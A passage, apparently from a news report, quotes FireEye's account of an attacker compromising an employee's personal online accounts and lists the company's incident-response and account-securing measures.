  • A number of the screen captures created by the Attacker and posted online are misleading, and seem intentionally so. They falsely implied successful access to our corporate network, despite the fact that we identified only failed login attempts from the Attacker.
FireEye highlighted that the Victim supports a small number of customers, only two of them were impacted by the leak.
Below are the actions taken by FireEye:
  • We contacted the two identified customers as soon as we learned of this incident and have kept them apprised of the situation throughout the week.
  • We immediately contained the Victim’s systems.
  • We collected and reviewed forensic data from the Victim’s systems.
  • We disabled the Victim’s FireEye corporate accounts.
  • We worked with the Victim to regain control of his personal online accounts.
  • We worked with the Victim to secure his personal online accounts, including implementing multi-factor authentication where possible.
  • We communicated to all FireEye employees, both verbally and in writing, a reminder to be vigilant and provided detailed steps to best secure their personal accounts.
  • We worked with the Victim and his online third party service providers to obtain any available log data that could assist our investigation.
  • We reviewed all data sent to and from FireEye email to the Victim’s online accounts.
  • We reviewed authentication and access activity on the Victim’s corporate, single sign-on (SSO), multi-factor, and third-party accounts.
The investigation is still ongoing.